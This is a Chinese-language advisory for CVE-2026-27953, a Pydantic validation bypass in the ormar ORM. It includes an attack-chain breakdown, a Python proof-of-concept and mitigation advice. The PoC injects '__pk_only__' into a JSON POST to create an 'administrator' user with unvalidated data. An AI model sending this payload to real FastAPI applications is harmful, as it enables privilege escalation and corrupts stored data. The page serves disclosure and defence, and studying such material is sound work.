CVE-2026-27953 CVSS 7.1 高危

CVE-2026-27953 ormar Pydantic验证绕过漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27953

漏洞类型

验证绕过

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ormar

漏洞概述

Python异步ORM库ormar在0.23.0及以下版本中存在Pydantic验证绕过漏洞。攻击者可以通过在JSON请求体中注入特定的参数（如`__pk_only__`）来绕过所有字段验证，直接将未经验证的数据持久化到数据库中。此外，还存在参数注入导致字段被置空的问题。该漏洞影响官方推荐的FastAPI集成模式，可能导致权限提升和数据完整性破坏。

技术细节

该漏洞源于ormar模型构造函数对特殊参数的处理逻辑缺陷。当ormar与FastAPI集成时，通常直接将ormar.Model用作请求体参数。攻击者在发送POST请求时，可在JSON数据中添加`"__pk_only__": true`。这使得ormar在实例化模型时进入一种特殊模式，跳过Pydantic定义的所有字段验证规则（如类型检查、范围限制等），从而允许直接保存非法数据。此外，利用`__excluded__`参数可以强制将特定字段（如邮箱或角色）置为null，覆盖模型默认值。这种机制本用于内部优化，但因缺乏校验被恶意利用，导致业务逻辑绕过和权限提升风险。

攻击链分析

STEP 1

侦察

识别目标Web应用使用了Python的ormar库与FastAPI框架，且直接使用ormar.Model作为请求体参数。

STEP 2

构造攻击载荷

攻击者构造包含恶意参数的JSON请求体，注入`"__pk_only__": true`或`"__excluded__": "field_name"`。

STEP 3

发送请求

向目标API端点发送POST请求，载荷绕过前端及Pydantic模型的字段校验逻辑。

STEP 4

执行攻击

服务端ormar实例化模型时跳过验证，将非法数据直接写入数据库，或利用`__excluded__`置空关键字段（如邮箱、角色）。

STEP 5

达成影响

攻击者实现数据完整性破坏、权限提升或绕过业务逻辑限制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc():
    target_url = "http://vulnerable-app/api/users"
    
    # Malicious payload to bypass Pydantic validation
    # Assuming the endpoint expects a User model with validation on 'email' and 'role'
    payload = {
        "username": "hacker",
        "email": "invalid-email-format",  # Normally would fail validation
        "role": "administrator",           # Normally restricted
        "__pk_only__": True                 # Bypass parameter
    }
    
    try:
        response = requests.post(target_url, json=payload)
        if response.status_code == 200:
            print("[+] Exploit successful! Data persisted without validation.")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    exploit_poc()

影响范围

ormar <= 0.23.0

防御指南

临时缓解措施

建议开发者立即检查代码中是否直接使用了ormar.Model作为FastAPI的请求参数。作为临时缓解措施，应引入中间层Pydantic模型（pydantic.BaseModel）来接收并严格验证用户输入，确保数据清洗完成后再转换为ormar模型对象进行数据库操作，从而隔离外部输入与ormar内部参数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表